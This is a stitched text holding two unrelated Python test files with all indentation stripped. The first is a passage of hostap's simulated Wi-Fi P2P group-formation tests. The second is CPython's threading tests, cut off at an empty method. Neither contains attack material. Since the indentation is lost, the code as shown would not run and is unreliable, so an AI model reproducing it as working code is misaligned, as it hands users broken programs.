dev[1].request("P2P_CANCEL")
dev[0].p2p_stop_find()
dev[1].p2p_stop_find()
dev[0].dump_monitor()
dev[1].dump_monitor()
time.sleep(0.1)
dev[0].flush_scan_cache()
dev[1].flush_scan_cache()
time.sleep(0.1)
def test_grpform_pbc_overlap(dev, apdev):
"""P2P group formation during PBC overlap"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
time.sleep(0.1)
    # Since the P2P Client scan case is now optimized to use a specific SSID, the
    # WPS AP will not reply to that and the scan after GO Negotiation can quite
    # likely miss the AP due to the dwell time being short enough to miss the Beacon
    # frame. This has made the test case somewhat pointless, but keep it here
    # for now with an additional scan to confirm that PBC detection works if
    # there is a BSS entry for an overlapping AP.
for i in range(0, 5):
dev[0].scan(freq="2412")
if dev[0].get_bss(apdev[0]['bssid']) is not None:
break
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].global_request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].global_request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED"], timeout=15)
if ev is None:
raise Exception("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_pbc_overlap_group_iface(dev, apdev):
"""P2P group formation during PBC overlap using group interfaces"""
    # Note: Need to include the P2P IE from the AP to get the P2P interface BSS
    # update to use this information.
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1",
"beacon_int": "15", 'manage_p2p': '1' }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_stop_find()
dev[0].scan(freq="2412")
dev[0].p2p_listen()
if "OK" not in dev[0].global_request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].global_request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED",
"P2P-GROUP-FORMATION-SUCCESS"], timeout=15)
if ev is None or "WPS-OVERLAP-DETECTED" not in ev:
# Do not report this as failure since the P2P group formation case
# using a separate group interface has limited chances of "seeing" the
# overlapping AP due to a per-SSID scan and no prior scan operations on
# the group interface.
logger.info("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_goneg_fail_with_group_iface(dev):
"""P2P group formation fails while using group interface"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].p2p_listen()
peer = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(peer):
raise Exception("Peer " + peer + " not found")
if "OK" not in dev[1].request("P2P_REJECT " + dev[0].p2p_dev_addr()):
raise Exception("P2P_REJECT failed")
if "OK" not in dev[0].request("P2P_CONNECT " + peer + " pbc"):
raise Exception("P2P_CONNECT failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
def test_grpform_cred_ready_timeout(dev, apdev, params):
"""P2P GO Negotiation wait for credentials to become ready [long]"""
if not params['long']:
raise HwsimSkip("Skip test case with long duration due to --long not specified")
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
if not dev[2].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found(2)")
start = os.times()[4]
cmd = "P2P_CONNECT " + addr1 + " 12345670 display"
if "OK" not in dev[0].global_request(cmd):
raise Exception("Failed to initiate GO Neg")
if "OK" not in dev[2].global_request(cmd):
raise Exception("Failed to initiate GO Neg(2)")
# First, check with p2p_find
ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=30)
if ev is not None:
raise Exception("Too early GO Negotiation timeout reported(2)")
dev[2].dump_monitor()
logger.info("Starting p2p_find to change state")
dev[2].p2p_find()
ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=100)
if ev is None:
raise Exception("GO Negotiation failure timed out(2)")
dev[2].dump_monitor()
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds(2)".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time(2): {}".format(end - start))
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
wpas.p2p_listen()
ev = dev[2].wait_global_event(["P2P-DEVICE-FOUND"], timeout=10)
if ev is None:
raise Exception("Did not discover new device after GO Negotiation failure")
if wpas.p2p_dev_addr() not in ev:
raise Exception("Unexpected device found: " + ev)
dev[2].p2p_stop_find()
wpas.p2p_stop_find()
# Finally, verify without p2p_find
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=120)
if ev is None:
raise Exception("GO Negotiation failure timed out")
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time: {}".format(end - start))
def test_grpform_no_wsc_done(dev):
"""P2P group formation with WSC-Done not sent"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
for i in range(0, 2):
dev[0].request("SET ext_eapol_frame_io 1")
dev[1].request("SET ext_eapol_frame_io 1")
dev[0].p2p_listen()
dev[1].p2p_go_neg_auth(addr0, "12345670", "display", 0)
dev[1].p2p_listen()
dev[0].p2p_go_neg_init(addr1, "12345670", "enter", timeout=20,
go_intent=15, wait_group=False)
mode = None
while True:
ev = dev[0].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from GO")
if not mode:
mode = dev[0].get_status_field("mode")
res = dev[1].request("EAPOL_RX " + addr0 + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[1].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from P2P Client")
msg = ev.split(' ')[2]
if msg[46:56] == "102200010f":
logger.info("Drop WSC_Done")
dev[0].request("SET ext_eapol_frame_io 0")
dev[1].request("SET ext_eapol_frame_io 0")
# Fake EAP-Failure to complete session on the client
id = msg[10:12]
dev[1].request("EAPOL_RX " + addr0 + " 0300000404" + id + "0004")
break
res = dev[0].request("EAPOL_RX " + addr1 + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on GO")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on P2P Client")
dev[0].remove_group()
dev[1].wait_go_ending_session()
if mode != "P2P GO - group formation":
raise Exception("Unexpected mode on GO during group formation: " + mode)
def test_grpform_wait_peer(dev):
"""P2P group formation wait for peer to become ready"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
dev[0].request("SET extra_roc_dur 500")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display go_intent=15"):
raise Exception("Failed to initiate GO Neg")
time.sleep(3)
dev[1].request("P2P_CONNECT " + addr0 + " 12345670 enter go_intent=0")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
dev[0].group_form_result(ev)
dev[0].request("SET extra_roc_dur 0")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
dev[0].remove_group()
def test_invalid_p2p_connect_command(dev):
"""P2P_CONNECT error cases"""
id = dev[0].add_network()
for cmd in [ "foo",
"00:11:22:33:44:55",
"00:11:22:33:44:55 pbc persistent=123",
"00:11:22:33:44:55 pbc persistent=%d" % id,
"00:11:22:33:44:55 pbc go_intent=-1",
"00:11:22:33:44:55 pbc go_intent=16",
"00:11:22:33:44:55 pin",
"00:11:22:33:44:55 pbc freq=0" ]:
if "FAIL" not in dev[0].request("P2P_CONNECT " + cmd):
raise Exception("Invalid P2P_CONNECT command accepted: " + cmd)
if "FAIL-INVALID-PIN" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 1234567"):
raise Exception("Invalid PIN was not rejected")
if "FAIL-INVALID-PIN" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 12345678a"):
raise Exception("Invalid PIN was not rejected")
if "FAIL-CHANNEL-UNSUPPORTED" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 pin freq=3000"):
raise Exception("Unsupported channel not reported")
def test_p2p_unauthorize(dev):
"""P2P_UNAUTHORIZE to unauthorize a peer"""
if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE foo"):
raise Exception("Invalid P2P_UNAUTHORIZE accepted")
if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE 00:11:22:33:44:55"):
raise Exception("P2P_UNAUTHORIZE for unknown peer accepted")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
pin = dev[0].wps_read_pin()
dev[0].p2p_go_neg_auth(addr1, pin, "display")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_UNAUTHORIZE " + addr1):
raise Exception("P2P_UNAUTHORIZE failed")
dev[1].p2p_go_neg_init(addr0, pin, "keypad", timeout=0)
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=10)
if ev is None:
raise Exception("No GO Negotiation Request RX reported")
def test_grpform_pbc_multiple(dev):
"""P2P group formation using PBC multiple times in a row"""
try:
dev[1].request("SET passive_scan 1")
for i in range(5):
[i_res, r_res] = go_neg_pbc_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
finally:
dev[1].request("SET passive_scan 0")
dev[1].flush_scan_cache()
def test_grpform_not_ready(dev):
"""Not ready for GO Negotiation (listen)"""
addr0 = dev[0].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].global_request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("No P2P-GO-NEG-REQUEST event")
dev[0].dump_monitor()
time.sleep(5)
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer(2)")
for i in range(3):
dev[i].p2p_stop_find()
def test_grpform_not_ready2(dev):
"""Not ready for GO Negotiation (search)"""
addr0 = dev[0].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[0].p2p_find(social=True)
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].global_request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("No P2P-GO-NEG-REQUEST event")
dev[0].dump_monitor()
time.sleep(1)
dev[2].p2p_listen()
ev = dev[0].wait_global_event(["P2P-DEVICE-FOUND"], timeout=10)
if ev is None:
raise Exception("Peer not discovered after GO Neg Resp(status=1) TX")
if addr2 not in ev:
raise Exception("Unexpected peer discovered: " + ev)
for i in range(3):
dev[i].p2p_stop_find()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import cosmo
_thread = import_module('_thread')
threading = import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
